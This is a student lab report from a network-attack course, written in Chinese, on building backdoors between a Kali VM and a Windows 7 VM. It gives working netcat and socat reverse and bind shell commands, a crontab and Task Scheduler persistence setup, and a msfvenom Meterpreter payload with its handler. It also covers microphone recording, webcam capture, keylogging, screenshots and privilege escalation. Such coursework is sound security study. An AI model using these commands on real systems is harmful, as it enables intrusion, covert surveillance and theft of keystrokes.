2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载破解游戏,盗版电影或安装来历不明的软件,可能被留下后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win环境下可以开机自动启动,linux环境可以用corn启动。
(3)Meterpreter有哪些给你映像深刻的功能?
可以自己定制后门程序,针对不同用户不同主机不同人群。
(4)如何发现自己有系统有没有被安装后门?
杀毒软件报错,开启防火墙等防护措施。

任务一

使用ipconfig查询win7的IP地址
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

进入ncat文件夹中,使用命令ncat.exe -l -p 5337监听本机的5337端口
在kali环境中使用netcat命令连接到Windows主机,使用netcat 命令netcat 192.168.1.101 5337 -e /bin/sh进行连接
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

即可获取kali权限

任务二

使用ifconfig查看kali的IP地址
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

使用nc -l -p 5337指令监听5337端口
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

在Windows下,使用ncat.exe -e cmd.exe 192.168.1.154 5337反向连接kali的5337端口
在kali下可以看到已经获得Windows权限Microsoft Windows,可以输入命令进行操作
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

任务三

首先在Windows下监听5337端口ncat.exe -l 5337
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

从kali使用netcat 192.168.1.101 5337命令连接到Windows端口
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

建立连接后可以进行数据传输
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

任务四

在Windows系统下,使用ncat.exe -l -p 5337监听5337端口

在kali中,使用crontab -e指令编辑一条定时任务,输入指令后选3进入crontab编辑界面

在最后一行添加07 * * * * /bin/netcat 192.168.1.101 5337 -e /bin/sh,在每个小时的第07分反向连接Windows主机的5337端口,然后保存退出

因为做的时候是20:05 于是我设定07启动

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

任务五

在win7右键我的电脑,点击管理,在任务计划程序中点击创建任务,填写任务名字并编辑触发器。
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

点击操作选择启动程序程序或脚本填写你自己的socat.exe程序的路径,在添加参数中填写tcp-listen:5337 exec:cmd.exe,pty,stderr

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

创建完成之后锁定计算机再重新启动发现程序已经在运行了

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

在kali虚拟机中输入socat - tcp:192.168.1.101:5337可以发现已经成功获得了一个cmd shell

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

任务六

在kali上执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe这里的IP地址填写kali的IP地址,生成后门程序20165337_backdoor.exe

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

在Windows下进入ncat文件夹输入命令ncat.exe -lv 5337 > 20165337_backdoor.exe,被控主机就进入了文件接收模式

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

在kali中输入nc 192.168.1.101 5337 < 20165337_backdoor.exe,这里的IP为win7的IP,进行后门文件的传输

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

传输完成
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

在Kali上使用命令msfconsole进入msf控制台

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

输入:
use exploit/multi/handler使用监听模块,
set payload windows/meterpreter/reverse_tcp设置payload
set LHOST 192.168.1.154设置反弹回连的IP和端口,这里用的是kali的IP
set LPORT 5337设置反弹回连的IP和端口
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

输入show options

exploit使用监听

运行Win7的后门程序
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

kali已经获取权限

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

任务七

在任务六的基础上进行
使用record_mic指令截获一段音频,用-d选项设置录制时间

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

使用webcam_snap指令可以使用摄像头进行拍照
但是win7不能调用摄像头,会出现以下界面

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

使用keyscan_start开始记录下敲键的过程,使用keyscan_dump指令读取敲键的记录
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

使用screenshot命令进行截屏

2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

使用命令getuid查看当前用户,使用getsystem命令提权
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践

上一篇:mesos 学习笔记1 -- mesos安装和配置


下一篇:Java反序列化漏洞详解